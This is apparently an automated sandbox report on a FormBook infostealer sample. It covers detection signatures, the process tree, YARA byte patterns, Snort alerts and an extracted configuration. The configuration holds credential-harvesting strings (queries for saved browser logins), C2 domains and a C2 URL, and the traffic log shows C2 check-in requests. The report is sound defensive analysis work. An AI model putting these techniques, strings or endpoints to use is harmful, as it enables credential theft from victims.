Loading ...

Play interactive tourEdit tour

Analysis Report 65BV6gbGFl.exe

Overview

General Information

Sample Name:65BV6gbGFl.exe
Analysis ID:339315
MD5:deed11e2b4b23dbe0c9ef99b5390bd6f
SHA1:158662003b5e63c1419267d5e8b0d4ce79e72081
SHA256:326090842ee6d692e02ae131a2003658939f60e79bceb7bad983cfe16400062f
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 65BV6gbGFl.exe (PID: 6372 cmdline: 'C:\Users\user\Desktop\65BV6gbGFl.exe' MD5: DEED11E2B4B23DBE0C9EF99B5390BD6F)
    • 65BV6gbGFl.exe (PID: 3028 cmdline: C:\Users\user\Desktop\65BV6gbGFl.exe MD5: DEED11E2B4B23DBE0C9EF99B5390BD6F)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 6952 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 7144 cmdline: /c del 'C:\Users\user\Desktop\65BV6gbGFl.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bbc", "KEY1_OFFSET 0x1d57f", "CONFIG SIZE : 0xc7", "CONFIG OFFSET 0x1d683", "URL SIZE : 25", "searching string pattern", "strings_offset 0x1c193", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa2fc2b8a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d3f33", "0x9f715022", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0120fa", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01445", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "valentinakasu.com", "soyelmatador.com", "collaborativeprosperity.com", "power8brokers.com", "nexus-ink.com", "manpasandmeatmarket.com", "the-ethical-forums.today", "maryannpark.com", "bikininbodymommy.com", "pxwuo.com", "bigbangmerch.com", "okaysinger.com", "shopcarpe.com", "rainbowhillsswimclub.com", "crifinmarket.com", "ebl-play.net", "forceandsonsequipment.com", "viagraytqwi.com", "latashashop.com", "suffocatinglymundanepodcast.com", "metanoria.com", "camera-kento.com", "hotsaledeals.store", "outlawgospelshow.com", "saisaharashipping.com", "buyiprod.com", "pestigenix.com", "opendesignpodcast.com", "patentml.com", "covaxbiotech.com", "youjar.com", "domvy.xyz", "remodelmemphis.com", "milehighdistributionllc.com", "merchandisingpremium.com", "fallguysmovile.com", "actuelburo.xyz", "nedlebow.com", "shopcryptocurrency247.com", "riellymoore.com", "affinitymotorsales.com", "akmh.pro", "hsrrxs.com", "atlanticdentallab.com", "sagarpantry.com", "murinemodel.com", "karybeautycare.com", "boshangkeji.com", "dailynewstodays.com", "oregonpyramids.com", "dsjmzyz.com", "gidagozlemevi.com", "tribelessofficial.com", "cyberonica.com", "onehourcheckout.com", "tenaflypedatrics.com", "nbworldfire.com", "setyourhead.com", "manticore-habitat.com", "iqftomatoes.com", "fejsearesete.com", "gregsgradeaappliancerepair.com", "sfmfgco.com", "directprnews.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.thesiromiel.com/kgw/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.1008317476.0000000000EE0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.1008317476.0000000000EE0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.1008317476.0000000000EE0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.1008210672.0000000000DA0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.1008210672.0000000000DA0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.65BV6gbGFl.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.65BV6gbGFl.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.65BV6gbGFl.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        1.2.65BV6gbGFl.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.65BV6gbGFl.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: 65BV6gbGFl.exeAvira: detected
          Found malware configurationShow sources
          Source: 1.2.65BV6gbGFl.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bbc", "KEY1_OFFSET 0x1d57f", "CONFIG SIZE : 0xc7", "CONFIG OFFSET 0x1d683", "URL SIZE : 25", "searching string pattern", "strings_offset 0x1c193", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa2fc2b8a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d3f33", "0x9f715022", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0120fa", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01445", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: 65BV6gbGFl.exeVirustotal: Detection: 34%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.1008317476.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1008210672.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.705655666.0000000001170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1008715043.0000000003240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.705409685.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.668132085.0000000003FD1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.704845326.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.65BV6gbGFl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.65BV6gbGFl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 65BV6gbGFl.exeJoe Sandbox ML: detected
          Source: 1.2.65BV6gbGFl.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 65BV6gbGFl.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 65BV6gbGFl.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.677864614.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 65BV6gbGFl.exe, 00000001.00000002.705832250.00000000012CF000.00000040.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1009183411.000000000394F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 65BV6gbGFl.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.677864614.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.186.238.101:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.186.238.101:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.186.238.101:80
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /kgw/?tTrL=Fpgl&D81dO=Q8j3zo2PyWwTAT2GiUT3xIethN2qaDDEMDPTiTcyve6+EbM4cYnHuFUs864URq+F/upv HTTP/1.1Host: www.fallguysmovile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kgw/?tTrL=Fpgl&D81dO=KjbuJJdeVq7diM0Fg7aQkrQXEwOw5P1EeEOzKgXGIrFUAWFa+z+/Ho4yN3tuV7ElJqtC HTTP/1.1Host: www.pxwuo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kgw/?D81dO=3dsCTSsKJfcfLyYHdfjcimIAevlOxP45YAOPNmiGb3RckDOY5KdZ2EMbApwY76ndqYux&tTrL=Fpgl HTTP/1.1Host: www.outlawgospelshow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kgw/?tTrL=Fpgl&D81dO=v5Yiuhvr0F6MYz3e4dEgNYCJUmrmKekWwpiHMAfHDUslibx/6TCs/ka/UcoIa2V5gzCm HTTP/1.1Host: www.karybeautycare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 35.186.238.101 35.186.238.101
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: GET /kgw/?tTrL=Fpgl&D81dO=Q8j3zo2PyWwTAT2GiUT3xIethN2qaDDEMDPTiTcyve6+EbM4cYnHuFUs864URq+F/upv HTTP/1.1Host: www.fallguysmovile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kgw/?tTrL=Fpgl&D81dO=KjbuJJdeVq7diM0Fg7aQkrQXEwOw5P1EeEOzKgXGIrFUAWFa+z+/Ho4yN3tuV7ElJqtC HTTP/1.1Host: www.pxwuo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kgw/?D81dO=3dsCTSsKJfcfLyYHdfjcimIAevlOxP45YAOPNmiGb3RckDOY5KdZ2EMbApwY76ndqYux&tTrL=Fpgl HTTP/1.1Host: www.outlawgospelshow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kgw/?tTrL=Fpgl&D81dO=v5Yiuhvr0F6MYz3e4dEgNYCJUmrmKekWwpiHMAfHDUslibx/6TCs/ka/UcoIa2V5gzCm HTTP/1.1Host: www.karybeautycare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.fallguysmovile.com
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 65BV6gbGFl.exe, 00000000.00000002.666713130.0000000002FD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000002.00000000.666700748.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
